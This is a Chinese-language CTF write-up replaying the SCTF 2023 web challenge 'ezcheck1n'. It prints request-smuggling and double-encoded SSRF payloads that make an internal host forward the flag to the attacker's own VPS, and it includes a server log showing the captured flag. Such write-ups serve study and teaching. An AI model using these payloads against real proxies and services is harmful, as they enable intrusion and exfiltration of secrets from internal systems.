SCTF WEB 复现

ezcheck1n

当时把请求走私的题都看烂了,把所以走私前和走私后的host和/2023,2022也都试了,最后看wp发现是走私后的GET请求中的问号需要编码。。自己太逆天了

最后payload:

1
GET /2023/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/2022.php%3furl=ip:port/?flag=1 HTTP/1.1

NU1L的Payload分析

1
2
3
4
5
6
7
8
9
GET /2023/&url=172.20.0.2:8080/2022.php%253furl=vps:port/ss HTTP/1.1
Host: 115.239.215.75:8082
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

假设代理到的是./2023.php,推测一下前端代理后的url为:http://115.239.215.75:8082/2023.php/&url=172.20.0.2:8080/2022.php%253furl=1.117.247.14:8000/ss

通过报错(构造HTTP/111.1)可得负责内网实际的服务的主机为172.20.0.2:8080,

结合我的腾讯云实际收到的请求参数来推测:

115.239.215.75 - - [20/Jun/2023 11:41:07] code 404, message File not found
115.239.215.75 - - [20/Jun/2023 11:41:07] “GET /ssflag{fake_flag}?flag=SCTF{we1c0me_t0_SCTF2023&SYC_LOVE_YOU} HTTP/1.1” 404 -

内网主机执行了了2023.php(因为附带了fake flag),然后又去执行了2022.php,也就是说,通过给file_get_content传入http://115.239.215.75:8082/2022.php?url=vps:port,来使2023.php的file函数实际上请求了2个http,

但是想不通的是为什么会有flag=这个形式呢?payload中只有url参数,没有flag参数

这种payload的原理只能分析到这了,估计再深挖就得从源码层看了,果然强者的世界是无法理解的